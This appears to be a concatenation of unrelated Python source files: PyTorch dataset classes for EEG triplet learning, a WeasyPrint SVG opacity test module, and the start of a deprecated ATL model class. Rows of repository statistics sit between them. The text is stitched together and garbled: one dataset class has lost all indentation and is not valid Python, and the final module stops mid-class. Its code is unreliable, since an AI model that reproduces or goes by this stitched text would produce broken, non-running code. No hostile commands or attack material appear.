                x_data = x_data[np.s_[subj + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
                y_data = y_data[np.s_[subj + 54], self.trial[0]:self.trial[1]]
        elif valtype == 'subj':
            if subj is None:
                raise AssertionError()
            if istrain:
                x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :]
                y_data = y_data[subj, self.trial[0]:self.trial[1]]
            else:
                x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
                y_data = y_data[subj, self.trial[0]:self.trial[1]]
        else:
            raise AssertionError()
        self.x_data = x_data.reshape(-1, 1, self.in_chans, self.input_time_length)
        self.y_data = y_data.reshape(-1)
        # Subject id recovered from the combined label: subj = (label - label % 2) / 2.
        self.y_subj = (y_data.reshape(-1)-self.y_data%2)/2
        self.len = self.y_data.shape[0]
        # self.labels_set = np.unique(self.y_data)
        # self.label_to_indices = {label: np.where(self.y_data == label)[0]
        #                          for label in self.labels_set}
        self.input_labels_set = np.unique(y_data)
        # Hand-picked subject indices; expanded to both sessions and both task labels.
        bci_excellent = np.r_[43,20,27,1,28,32,35,44,36,2]
        bci_excellent = np.concatenate([bci_excellent,bci_excellent+54])
        bci_excellent = np.concatenate([bci_excellent*2,bci_excellent*2+1])
        self.labels_set = np.unique(bci_excellent)
        # Keep only labels that actually occur in the selected data.
        self.labels_set = np.intersect1d(self.labels_set,self.input_labels_set)
        self.label_to_indices = {label: np.where(self.y_data == label)[0]
                                 for label in self.labels_set}
        random_state = np.random.RandomState(0)
        if not istrain:
            # Fixed evaluation triplets: (anchor, same-task/diff-subject, diff-task/diff-subject).
            triplets = [[i,
                         random_state.choice(self.label_to_indices[ # same task, diff subj
                             np.random.choice(
                                 self.labels_set[np.where(
                                     (self.labels_set % 2 == self.y_data[i] % 2) & (
                                         (self.labels_set - self.labels_set % 2) / 2 !=
                                         self.y_subj[i]), True, False)]
                             )
                         ]),
                         random_state.choice(self.label_to_indices[#diff task, diff subj
                             np.random.choice(
                                 self.labels_set[np.where((self.labels_set%2!=self.y_data[i]%2) & ((self.labels_set-self.labels_set%2)/2 != self.y_subj[i]), True,False)]
                             )
                         ])
                         ]
                        for i in range(self.len)]
            self.test_triplets = triplets

    def __getitem__(self, index):
        # Training: sample a same-task/different-subject positive and a
        # different-task/different-subject negative from the excellent-subject
        # pool. Evaluation: fixed triplets. Time axis cropped to 100:500.
        if self.istrain:
            img1 = self.x_data[index,:,:,100:500]
            y1 = self.y_data[index]
            positive_index = index
            while positive_index == index:
                positive_index = np.random.choice(self.label_to_indices[np.random.choice(
                    self.labels_set[np.where(
                        (self.labels_set % 2 == y1 % 2) & (
                            (self.labels_set - self.labels_set % 2) / 2 !=
                            (y1-y1%2)/2), True, False)]
                )])
            negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) & ((self.labels_set-self.labels_set%2)/2 != (y1-y1%2)/2), True,False)])
            # negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) & ((self.labels_set-self.labels_set%2)/2 != (y1-y1%2)/2), True,False)]) #diffsub
            negative_index = np.random.choice(self.label_to_indices[negative_label])
            img2 = self.x_data[positive_index,:,:,100:500]
            img3 = self.x_data[negative_index,:,:,100:500]
            y2 = self.y_data[positive_index]
            y3 = self.y_data[negative_index]
        else:
            img1 = self.x_data[self.test_triplets[index][0],:,:,100:500]
            img2 = self.x_data[self.test_triplets[index][1],:,:,100:500]
            img3 = self.x_data[self.test_triplets[index][2],:,:,100:500]
            y1 = self.y_data[self.test_triplets[index][0]]
            y2 = self.y_data[self.test_triplets[index][1]]
            y3 = self.y_data[self.test_triplets[index][2]]
        img1 = torch.from_numpy(img1).type(torch.FloatTensor)
        img2 = torch.from_numpy(img2).type(torch.FloatTensor)
        img3 = torch.from_numpy(img3).type(torch.FloatTensor)
        if self.transform is not None:
            img1 = self.transform(img1)
            img2 = self.transform(img2)
            img3 = self.transform(img3)
        # Labels collapsed to the task bit.
        return (img1, img2, img3), (y1%2,y2%2,y3%2)

    def __len__(self):
        return self.len
class TripletGigaOrigin(Dataset):
def __init__(self,x,y, valtype, transform=None,istrain = True, sess=1,subj=None, trial=None):
self.transform = transform
self.istrain = istrain
if trial is None:
if istrain:
self.trial = 0,200
else:
self.trial = 100,200 #online
else:
self.trial = trial
x_data = x.copy()
y_data = y.copy()
self.in_chans = x_data.shape[2]
self.input_time_length = x_data.shape[3]
x_data = x_data.reshape(108, -1, 1, self.in_chans, self.input_time_length)
y_data = y_data.reshape(108,-1)
if valtype == 'sess':
if istrain:
x_data = x_data[np.s_[0:54], self.trial[0]:self.trial[1], :, :, :]
y_data = y_data[np.s_[0:54], self.trial[0]:self.trial[1]]
else:
x_data = x_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1]]
elif valtype == 'loso':
if subj is None:
raise AssertionError()
if istrain:
x_data = np.delete(x_data, np.s_[subj, subj + 54], 0) # leave one subj
y_data = np.delete(y_data, np.s_[subj, subj + 54], 0)
else:
x_data = x_data[np.s_[subj + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[np.s_[subj + 54], self.trial[0]:self.trial[1]]
elif valtype == 'subj':
if subj is None:
raise AssertionError()
if istrain:
x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :]
y_data = y_data[subj, self.trial[0]:self.trial[1]]
else:
x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
y_data = y_data[subj, self.trial[0]:self.trial[1]]
else:
raise AssertionError()
self.x_data = x_data.reshape(-1, 1, self.in_chans, self.input_time_length)
self.y_data = y_data.reshape(-1)
self.y_subj = (y_data.reshape(-1)-self.y_data%2)/2
self.len = self.y_data.shape[0]
self.labels_set = np.unique(self.y_data)
self.label_to_indices = {label: np.where(self.y_data == label)[0]
for label in self.labels_set}
random_state = np.random.RandomState(0)
if not istrain:
self.labels_set = np.unique(self.y_data)
self.label_to_indices = {label: np.where(self.y_data == label)[0]
for label in self.labels_set}
triplets = [[i,
random_state.choice(self.label_to_indices[ # samp task, diff subj
np.random.choice(
self.labels_set[np.where(
(self.labels_set % 2 == self.y_data[i] % 2), True, False)]
)
]),
random_state.choice(self.label_to_indices[#diff task, same subj
np.random.choice(
self.labels_set[np.where((self.labels_set%2!=self.y_data[i]%2), True,False)]
)
])
]
for i in range(self.len)]
self.test_triplets = triplets
    def __getitem__(self, index):
        """Return an (anchor, positive, negative) triplet of EEG windows.

        Each image is a [1, channels, 400]-sample crop (samples 100:500) of a
        trial. The positive shares the anchor's task parity (label % 2); the
        negative has the opposite parity. Labels are returned mod 2.

        NOTE(review): np.random.seed(0) reseeds the global RNG on every call,
        so training triplets are deterministic per index and identical across
        epochs — confirm this is intended.
        """
        np.random.seed(0)
        if self.istrain:
            img1 = self.x_data[index,:,:,100:500]
            y1 = self.y_data[index]
            positive_index = index
            # Resample until the positive is a different trial than the anchor.
            while positive_index == index:
                positive_index = np.random.choice(self.label_to_indices[np.random.choice(
                    self.labels_set[np.where(
                        (self.labels_set % 2 == y1 % 2), True, False)]
                )])
            # Negative: any label with the opposite task parity.
            negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) , True,False)])
            # negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) & ((self.labels_set-self.labels_set%2)/2 != (y1-y1%2)/2), True,False)]) #diffsub
            negative_index = np.random.choice(self.label_to_indices[negative_label])
            img2 = self.x_data[positive_index,:,:,100:500]
            img3 = self.x_data[negative_index,:,:,100:500]
            y2 = self.y_data[positive_index]
            y3 = self.y_data[negative_index]
        else:
            # Evaluation: use the triplets precomputed in __init__.
            img1 = self.x_data[self.test_triplets[index][0],:,:,100:500]
            img2 = self.x_data[self.test_triplets[index][1],:,:,100:500]
            img3 = self.x_data[self.test_triplets[index][2],:,:,100:500]
            y1 = self.y_data[self.test_triplets[index][0]]
            y2 = self.y_data[self.test_triplets[index][1]]
            y3 = self.y_data[self.test_triplets[index][2]]
        img1 = torch.from_numpy(img1).type(torch.FloatTensor)
        img2 = torch.from_numpy(img2).type(torch.FloatTensor)
        img3 = torch.from_numpy(img3).type(torch.FloatTensor)
        if self.transform is not None:
            img1 = self.transform(img1)
            img2 = self.transform(img2)
            img3 = self.transform(img3)
        return (img1, img2, img3), (y1%2,y2%2,y3%2)
    def __len__(self):
        # Number of flattened trials selected in __init__.
        return self.len
class SiamesGiga(Dataset):
    """Triplet dataset over the 'Giga' EEG corpus (108 subject-sessions).

    Yields (anchor, positive, negative) trial crops where the positive shares
    the anchor's task parity (label % 2) and the negative does not.

    NOTE(review): this class duplicates the preceding triplet class verbatim;
    triplet sampling interleaves a seeded local RandomState with the global
    np.random stream, so the exact call order is load-bearing.
    """
    def __init__(self,x,y, valtype, transform=None,istrain = True, sess=1,subj=None, trial=None):
        # valtype: 'sess' (split by session), 'loso' (leave one subject out),
        # or 'subj' (within one subject-session). trial is a (min, max) range.
        # `sess` is accepted but unused.
        self.transform = transform
        self.istrain = istrain
        if trial is None:
            if istrain:
                self.trial = 0,200
            else:
                self.trial = 100,200 #online
        else:
            self.trial = trial
        x_data = x.copy()
        y_data = y.copy()
        self.in_chans = x_data.shape[2]
        self.input_time_length = x_data.shape[3]
        # Regroup flat trials into 108 subject-sessions.
        x_data = x_data.reshape(108, -1, 1, self.in_chans, self.input_time_length)
        y_data = y_data.reshape(108,-1)
        if valtype == 'sess':
            if istrain:
                x_data = x_data[np.s_[0:54], self.trial[0]:self.trial[1], :, :, :]
                y_data = y_data[np.s_[0:54], self.trial[0]:self.trial[1]]
            else:
                x_data = x_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
                y_data = y_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1]]
        elif valtype == 'loso':
            if subj is None:
                raise AssertionError()
            if istrain:
                x_data = np.delete(x_data, np.s_[subj, subj + 54], 0) # leave one subj
                y_data = np.delete(y_data, np.s_[subj, subj + 54], 0)
            else:
                x_data = x_data[np.s_[subj + 54], self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
                y_data = y_data[np.s_[subj + 54], self.trial[0]:self.trial[1]]
        elif valtype == 'subj':
            if subj is None:
                raise AssertionError()
            if istrain:
                x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :]
                y_data = y_data[subj, self.trial[0]:self.trial[1]]
            else:
                x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :] # tests sess2 online
                y_data = y_data[subj, self.trial[0]:self.trial[1]]
        else:
            raise AssertionError()
        self.x_data = x_data.reshape(-1, 1, self.in_chans, self.input_time_length)
        self.y_data = y_data.reshape(-1)
        # Subject index recovered from label encoding (label = 2*subject + task).
        self.y_subj = (y_data.reshape(-1)-self.y_data%2)/2
        self.len = self.y_data.shape[0]
        self.labels_set = np.unique(self.y_data)
        self.label_to_indices = {label: np.where(self.y_data == label)[0]
                                 for label in self.labels_set}
        random_state = np.random.RandomState(0)
        if not istrain:
            # Precompute fixed evaluation triplets (anchor, same-parity, other-parity).
            self.labels_set = np.unique(self.y_data)
            self.label_to_indices = {label: np.where(self.y_data == label)[0]
                                     for label in self.labels_set}
            triplets = [[i,
                         random_state.choice(self.label_to_indices[ # samp task, diff subj
                             np.random.choice(
                                 self.labels_set[np.where(
                                     (self.labels_set % 2 == self.y_data[i] % 2), True, False)]
                             )
                         ]),
                         random_state.choice(self.label_to_indices[#diff task, same subj
                             np.random.choice(
                                 self.labels_set[np.where((self.labels_set%2!=self.y_data[i]%2), True,False)]
                             )
                         ])
                         ]
                        for i in range(self.len)]
            self.test_triplets = triplets
    def __getitem__(self, index):
        """Return an (anchor, positive, negative) triplet; labels mod 2."""
        # NOTE(review): reseeding the global RNG each call makes sampling
        # deterministic per index — confirm intended.
        np.random.seed(0)
        if self.istrain:
            img1 = self.x_data[index,:,:,100:500]
            y1 = self.y_data[index]
            positive_index = index
            while positive_index == index:
                positive_index = np.random.choice(self.label_to_indices[np.random.choice(
                    self.labels_set[np.where(
                        (self.labels_set % 2 == y1 % 2), True, False)]
                )])
            negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) , True,False)])
            # negative_label = np.random.choice(self.labels_set[np.where((self.labels_set%2!=y1%2) & ((self.labels_set-self.labels_set%2)/2 != (y1-y1%2)/2), True,False)]) #diffsub
            negative_index = np.random.choice(self.label_to_indices[negative_label])
            img2 = self.x_data[positive_index,:,:,100:500]
            img3 = self.x_data[negative_index,:,:,100:500]
            y2 = self.y_data[positive_index]
            y3 = self.y_data[negative_index]
        else:
            img1 = self.x_data[self.test_triplets[index][0],:,:,100:500]
            img2 = self.x_data[self.test_triplets[index][1],:,:,100:500]
            img3 = self.x_data[self.test_triplets[index][2],:,:,100:500]
            y1 = self.y_data[self.test_triplets[index][0]]
            y2 = self.y_data[self.test_triplets[index][1]]
            y3 = self.y_data[self.test_triplets[index][2]]
        img1 = torch.from_numpy(img1).type(torch.FloatTensor)
        img2 = torch.from_numpy(img2).type(torch.FloatTensor)
        img3 = torch.from_numpy(img3).type(torch.FloatTensor)
        if self.transform is not None:
            img1 = self.transform(img1)
            img2 = self.transform(img2)
            img3 = self.transform(img3)
        return (img1, img2, img3), (y1%2,y2%2,y3%2)
    def __len__(self):
        # Number of flattened trials selected in __init__.
        return self.len
class GigaDataset(Dataset):
    """Plain (x, y) dataset over the 'Giga' EEG corpus (108 subject-sessions).

    The flat trial array is regrouped as (108, trials, 1, channels, time) and
    sliced according to `valtype`:
      * 'sess': train on subject-sessions 0-53, test on 54-107.
      * 'loso': training drops both sessions of subject `subj`; testing uses
        that subject's second session.
      * 'subj': train/test within the single subject-session `subj`.
    `trial` is a (min, max) trial range; when omitted it defaults to (0, 200)
    for training and (100, 200) ("online" trials) otherwise. `sess` is
    accepted for interface compatibility but unused.
    """
    def __init__(self, x, y, valtype, transform=None, istrain=True, sess=1, subj=None, trial=None):
        self.transform = transform
        if trial is None:
            self.trial = (0, 200) if istrain else (100, 200)  # online split
        else:
            self.trial = trial
        x_data = x.copy()
        y_data = y.copy()
        self.in_chans = x_data.shape[2]
        self.input_time_length = x_data.shape[3]
        # Regroup flat trials by the 108 subject-sessions.
        x_data = x_data.reshape(108, -1, 1, self.in_chans, self.input_time_length)
        y_data = y_data.reshape(108, -1)
        if valtype == 'sess':
            if istrain:
                x_data = x_data[np.s_[0:54], self.trial[0]:self.trial[1], :, :, :]
                y_data = y_data[np.s_[0:54], self.trial[0]:self.trial[1]]
            else:
                # Test on session 2 (subject-sessions 54-107), online trials.
                x_data = x_data[np.s_[54:108], self.trial[0]:self.trial[1], :, :, :]
                y_data = y_data[np.s_[54:108], self.trial[0]:self.trial[1]]
        elif valtype == 'loso':
            if subj is None:
                raise AssertionError()
            if istrain:
                # Leave out both sessions of the held-out subject.
                x_data = np.delete(x_data, np.s_[subj, subj + 54], 0)
                y_data = np.delete(y_data, np.s_[subj, subj + 54], 0)
            else:
                # Test on the held-out subject's second session.
                x_data = x_data[np.s_[subj + 54], self.trial[0]:self.trial[1], :, :, :]
                y_data = y_data[np.s_[subj + 54], self.trial[0]:self.trial[1]]
        elif valtype == 'subj':
            if subj is None:
                raise AssertionError()
            # Train and test paths were identical in the original; merged.
            x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :]
            y_data = y_data[subj, self.trial[0]:self.trial[1]]
        else:
            raise AssertionError()
        x_data = x_data.reshape(-1, 1, self.in_chans, self.input_time_length)
        y_data = y_data.reshape(-1)
        self.len = y_data.shape[0]
        self.x_data = torch.from_numpy(x_data).type(torch.FloatTensor)
        self.y_data = torch.from_numpy(y_data).long()

    def __getitem__(self, index):
        """Return (trial tensor of shape (1, channels, time), label)."""
        x = self.x_data[index, :, :, :]
        y = self.y_data[index]
        if self.transform:
            x = self.transform(x)
        return x, y

    def __len__(self):
        return self.len
class BCICDataset(Dataset):
    """Plain (x, y) dataset over BCI Competition IV data (9 subjects).

    The flat trial array is regrouped as (9, trials, 1, channels, time) and
    sliced according to `valtype` ('sess' / 'loso' / 'subj'); `trial` is a
    (min, max) trial range defaulting to (0, 200) for training and (100, 200)
    otherwise. `sess` is accepted but unused.

    NOTE(review): the 'sess' and 'loso' branches still use 54-based offsets
    copied from the 108-session Giga dataset; with only 9 subjects those
    indices look wrong (np.s_[subj, subj + 54] would be out of range) —
    behavior preserved here, confirm intent before using those modes.
    """
    def __init__(self, x, y, valtype, transform=None, istrain=True, sess=1, subj=None, trial=None):
        self.transform = transform
        if trial is None:
            self.trial = (0, 200) if istrain else (100, 200)  # online split
        else:
            self.trial = trial
        x_data = x.copy()
        y_data = y.copy()
        self.in_chans = x_data.shape[2]
        self.input_time_length = x_data.shape[3]
        # Regroup flat trials by the 9 subjects.
        x_data = x_data.reshape(9, -1, 1, self.in_chans, self.input_time_length)
        y_data = y_data.reshape(9, -1)
        if valtype == 'sess':
            if istrain:
                x_data = x_data[np.s_[0:54], self.trial[0]:self.trial[1], :, :, :]
                y_data = y_data[np.s_[0:54], self.trial[0]:self.trial[1]]
            else:
                x_data = x_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1], :, :, :]
                y_data = y_data[np.s_[0 + 54:54 + 54], self.trial[0]:self.trial[1]]
        elif valtype == 'loso':
            if subj is None:
                raise AssertionError()
            if istrain:
                x_data = np.delete(x_data, np.s_[subj, subj + 54], 0)
                y_data = np.delete(y_data, np.s_[subj, subj + 54], 0)
            else:
                x_data = x_data[np.s_[subj + 54], self.trial[0]:self.trial[1], :, :, :]
                y_data = y_data[np.s_[subj + 54], self.trial[0]:self.trial[1]]
        elif valtype == 'subj':
            if subj is None:
                raise AssertionError()
            # Train and test paths were identical in the original; merged.
            x_data = x_data[subj, self.trial[0]:self.trial[1], :, :, :]
            y_data = y_data[subj, self.trial[0]:self.trial[1]]
        else:
            raise AssertionError()
        x_data = x_data.reshape(-1, 1, self.in_chans, self.input_time_length)
        y_data = y_data.reshape(-1)
        self.len = y_data.shape[0]
        self.x_data = torch.from_numpy(x_data).type(torch.FloatTensor)
        self.y_data = torch.from_numpy(y_data).long()

    def __getitem__(self, index):
        """Return (trial tensor of shape (1, channels, time), label)."""
        x = self.x_data[index, :, :, :]
        y = self.y_data[index]
        if self.transform:
            x = self.transform(x)
        return x, y

    def __len__(self):
        return self.len
def load_smt(path='C:/Users/dk/PycharmProjects/data/giga', fs=100):
    """Load cached 'Giga' SMT epochs and labels from pickles.

    Parameters
    ----------
    path : str
        Directory containing 'epoch_labels.pkl' and 'smt{fs}_fix.pkl'.
    fs : int
        Sampling rate of the cached epochs; must be 100 or 250.

    Returns
    -------
    (x_data, y_data) where x_data gains a singleton channel axis and the
    first second (fs samples) of every epoch is trimmed off.

    Raises
    ------
    ValueError
        If fs is not 100 or 250 (previously this fell through to a
        confusing UnboundLocalError).
    """
    with open(path + '/epoch_labels.pkl', 'rb') as f:
        y_data = pickle.load(f)
    if fs == 100:
        with open(path + '/smt100_fix.pkl', 'rb') as f:
            x_data = pickle.load(f)
    elif fs == 250:
        with open(path + '/smt250_fix.pkl', 'rb') as f:
            x_data = pickle.load(f)
    else:
        raise ValueError('fs must be 100 or 250, got %r' % (fs,))
    x_data = np.expand_dims(x_data, axis=1)
    x_data = x_data[:, :, :, fs:]  # drop the first second (fs samples)
    return x_data, y_data
def load_bcic(path='C:/Users/dk/PycharmProjects/test_braindecode/braindecode-master_new/examples', fs=100):
    """Load cached BCI Competition IV 4-class epochs and labels from pickles.

    Returns (x_data, y_data) where x_data gains a singleton channel axis and
    the first 125 samples of every epoch are trimmed off. `fs` is accepted
    for interface compatibility but unused.

    Note: the original implementation also ran sklearn's Normalizer over
    every trial into a scratch array that was never returned (and printed
    each index); that dead, slow loop has been removed — the returned data
    is byte-identical to before.
    """
    with open(path + '/bcic4class_labels.pkl', 'rb') as f:
        y_data = pickle.load(f)
    with open(path + '/bcic4class.pkl', 'rb') as f:
        x_data = pickle.load(f)
    x_data = np.expand_dims(x_data, axis=1)
    x_data = x_data[:, :, :, 125:]  # drop the first 125 samples of each epoch
    return x_data, y_data
| 41.00262
| 189
| 0.518084
| 6,154
| 46,948
| 3.751381
| 0.039974
| 0.055661
| 0.060816
| 0.048514
| 0.937971
| 0.925063
| 0.916876
| 0.907866
| 0.905181
| 0.905181
| 0
| 0.043213
| 0.350835
| 46,948
| 1,145
| 190
| 41.00262
| 0.714276
| 0.073464
| 0
| 0.881733
| 0
| 0
| 0.00717
| 0.003112
| 0
| 0
| 0
| 0
| 0.032787
| 1
| 0.037471
| false
| 0
| 0.015222
| 0.010539
| 0.088993
| 0.002342
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5c91f2a0eba101a3a0f4edd1881e02d05bc5585b
| 5,175
|
py
|
Python
|
tests/draw/svg/test_opacity.py
|
rianmcguire/WeasyPrint
|
7e400663236d16121e14cf3183ce53828d056092
|
[
"BSD-3-Clause"
] | 4,512
|
2015-01-02T16:40:59.000Z
|
2022-03-31T17:26:28.000Z
|
tests/draw/svg/test_opacity.py
|
rianmcguire/WeasyPrint
|
7e400663236d16121e14cf3183ce53828d056092
|
[
"BSD-3-Clause"
] | 1,420
|
2015-01-07T21:17:01.000Z
|
2022-03-31T10:23:45.000Z
|
tests/draw/svg/test_opacity.py
|
rianmcguire/WeasyPrint
|
7e400663236d16121e14cf3183ce53828d056092
|
[
"BSD-3-Clause"
] | 640
|
2015-01-30T18:07:09.000Z
|
2022-03-24T20:17:42.000Z
|
"""
weasyprint.tests.test_draw.svg.test_opacity
-------------------------------------------
Test how opacity is handled for SVG.
"""
import pytest
from ...testing_utils import assert_no_logs
from .. import assert_same_rendering
# TODO: xfail tests fail because of GhostScript and are supposed to work with
# real PDF files.
opacity_source = '''
<style>
@page { size: 9px }
svg { display: block }
</style>
<svg width="9px" height="9px" xmlns="http://www.w3.org/2000/svg">%s</svg>'''
@assert_no_logs
def test_opacity():
    """Element-level `opacity` must render like pre-blended (50%) colors."""
    assert_same_rendering(9, 9, (
        ('opacity_reference', opacity_source % '''
          <rect x="2" y="2" width="5" height="5" stroke-width="2"
                stroke="rgb(127, 255, 127)" fill="rgb(127, 127, 255)" />
        '''),
        ('opacity', opacity_source % '''
          <rect x="2" y="2" width="5" height="5" stroke-width="2"
                stroke="lime" fill="blue" opacity="0.5" />
        '''),
    ))
@assert_no_logs
def test_fill_opacity():
    """`fill-opacity` must affect only the fill, not the stroke."""
    assert_same_rendering(9, 9, (
        ('fill_opacity_reference', opacity_source % '''
          <rect x="2" y="2" width="5" height="5"
                fill="blue" opacity="0.5" />
          <rect x="2" y="2" width="5" height="5" stroke-width="2"
                stroke="lime" fill="transparent" />
        '''),
        ('fill_opacity', opacity_source % '''
          <rect x="2" y="2" width="5" height="5" stroke-width="2"
                stroke="lime" fill="blue" fill-opacity="0.5" />
        '''),
    ))
@pytest.mark.xfail
@assert_no_logs
def test_stroke_opacity():
    """`stroke-opacity` must affect only the stroke, not the fill."""
    assert_same_rendering(9, 9, (
        ('stroke_opacity_reference', opacity_source % '''
          <rect x="2" y="2" width="5" height="5"
                fill="blue" />
          <rect x="2" y="2" width="5" height="5" stroke-width="2"
                stroke="lime" fill="transparent" opacity="0.5" />
        '''),
        ('stroke_opacity', opacity_source % '''
          <rect x="2" y="2" width="5" height="5" stroke-width="2"
                stroke="lime" fill="blue" stroke-opacity="0.5" />
        '''),
    ))
@pytest.mark.xfail
@assert_no_logs
def test_stroke_fill_opacity():
    """Combined `stroke-opacity` and `fill-opacity` on the same element."""
    assert_same_rendering(9, 9, (
        ('stroke_fill_opacity_reference', opacity_source % '''
          <rect x="2" y="2" width="5" height="5"
                fill="blue" opacity="0.5" />
          <rect x="2" y="2" width="5" height="5" stroke-width="2"
                stroke="lime" fill="transparent" opacity="0.5" />
        '''),
        ('stroke_fill_opacity', opacity_source % '''
          <rect x="2" y="2" width="5" height="5" stroke-width="2"
                stroke="lime" fill="blue"
                stroke-opacity="0.5" fill-opacity="0.5" />
        '''),
    ))
@pytest.mark.xfail
@assert_no_logs
def test_pattern_gradient_stroke_fill_opacity():
    """`stroke-opacity`/`fill-opacity` with gradient stroke and pattern fill."""
    assert_same_rendering(9, 9, (
        ('pattern_gradient_stroke_fill_opacity_reference', opacity_source % '''
          <defs>
            <linearGradient id="grad" x1="0" y1="0" x2="0" y2="1"
              gradientUnits="objectBoundingBox">
              <stop stop-color="black" offset="42.86%"></stop>
              <stop stop-color="green" offset="42.86%"></stop>
            </linearGradient>
            <pattern id="pat" x="0" y="0" width="2" height="2"
              patternUnits="userSpaceOnUse"
              patternContentUnits="userSpaceOnUse">
              <rect x="0" y="0" width="1" height="1" fill="blue" />
              <rect x="0" y="1" width="1" height="1" fill="red" />
              <rect x="1" y="0" width="1" height="1" fill="red" />
              <rect x="1" y="1" width="1" height="1" fill="blue" />
            </pattern>
          </defs>
          <rect x="2" y="2" width="5" height="5"
                fill="url(#pat)" opacity="0.5" />
          <rect x="2" y="2" width="5" height="5" stroke-width="2"
                stroke="url(#grad)" fill="transparent" opacity="0.5" />
        '''),
        ('pattern_gradient_stroke_fill_opacity', opacity_source % '''
          <defs>
            <linearGradient id="grad" x1="0" y1="0" x2="0" y2="1"
              gradientUnits="objectBoundingBox">
              <stop stop-color="black" offset="42.86%"></stop>
              <stop stop-color="green" offset="42.86%"></stop>
            </linearGradient>
            <pattern id="pat" x="0" y="0" width="2" height="2"
              patternUnits="userSpaceOnUse"
              patternContentUnits="userSpaceOnUse">
              <rect x="0" y="0" width="1" height="1" fill="blue" />
              <rect x="0" y="1" width="1" height="1" fill="red" />
              <rect x="1" y="0" width="1" height="1" fill="red" />
              <rect x="1" y="1" width="1" height="1" fill="blue" />
            </pattern>
          </defs>
          <rect x="2" y="2" width="5" height="5" stroke-width="2"
                stroke="url(#grad)" fill="url(#pat)"
                stroke-opacity="0.5" fill-opacity="0.5" />
        '''),
    ))
| 38.051471
| 79
| 0.499517
| 634
| 5,175
| 3.963722
| 0.149842
| 0.043772
| 0.033426
| 0.038997
| 0.859928
| 0.808595
| 0.787107
| 0.758456
| 0.719459
| 0.719459
| 0
| 0.055772
| 0.307053
| 5,175
| 135
| 80
| 38.333333
| 0.645008
| 0.042126
| 0
| 0.696429
| 0
| 0.214286
| 0.79311
| 0.090983
| 0
| 0
| 0
| 0.007407
| 0.107143
| 1
| 0.044643
| false
| 0
| 0.026786
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5c95e0acaa9d51105dbde2a4e81110d7cc429dc2
| 31,467
|
py
|
Python
|
old/atl_model.py
|
blackbat13/stv
|
fc73fd50ad1ab6a36a6b4d6b1aec02c4bcd1b094
|
[
"MIT"
] | 2
|
2021-07-11T09:52:59.000Z
|
2022-02-13T17:34:59.000Z
|
old/atl_model.py
|
blackbat13/stv
|
fc73fd50ad1ab6a36a6b4d6b1aec02c4bcd1b094
|
[
"MIT"
] | 3
|
2020-07-26T13:49:59.000Z
|
2021-01-19T18:04:10.000Z
|
old/atl_model.py
|
blackbat13/stv
|
fc73fd50ad1ab6a36a6b4d6b1aec02c4bcd1b094
|
[
"MIT"
] | null | null | null |
# DEPRECATED
import itertools
import copy
from tools.disjoint_set import *
__author__ = 'blackbat'
def create_array_of_size(size, basic_item):
    """Return a list of `size` independent shallow copies of `basic_item`.

    The original built the list with an append loop and returned a redundant
    extra slice copy; a comprehension does the same work in one pass.
    """
    return [basic_item.copy() for _ in range(size)]
def unique(l):
    """Remove duplicates from list *l* in place, keeping first occurrences in order."""
    # dict preserves insertion order (Python 3.7+), so this is an order-stable dedupe.
    l[:] = dict.fromkeys(l)
def and_operator(a, b):
    """Return the elements of *a* that also occur in *b*.

    Order and duplicates of *a* are preserved. Membership is tested against a
    set built once from *b* (states are hashable ints here), replacing the
    original O(len(a) * len(b)) list scan.
    """
    b_set = set(b)
    return [item for item in a if item in b_set]
class ATLModel:
    # DEPRECATED model for alternating-time temporal logic (ATL) checking.
    # NOTE(review): these are mutable class-level defaults shared by all
    # instances until __init__ rebinds them per instance; prefer setting them
    # only in __init__.
    number_of_agents = 0
    number_of_states = 0
    transitions = []                    # transitions[state] -> list of {'nextState', 'actions'}
    reverse_transitions = []            # incoming transitions per state
    pre_states = []                     # pre_states[state] -> set of predecessor states
    imperfect_information = []          # per agent: list of epistemic classes (sets of states)
    agents_actions = []                 # per agent: list of available actions
    states = []
    epistemic_class_membership = []     # per agent: state -> epistemic class number (-1 if none)
    epistemic_class_disjoint = None     # per agent: DisjointSet over states
    can_go_there = []                   # per agent: cached successors per class/action
    def __init__(self, number_of_agents, number_of_states):
        """Allocate per-state and per-agent model structures."""
        self.number_of_agents = number_of_agents
        self.number_of_states = number_of_states
        self.init_transitions()
        self.init_states()
        self.init_actions()
        self.init_epistemic_relation()
        # Per-agent cache filled by add_epistemic_class/find_where_can_go.
        self.can_go_there = [[] for _ in itertools.repeat(None, number_of_agents)]
def init_transitions(self):
self.transitions = [[] for _ in itertools.repeat(None, self.number_of_states)]
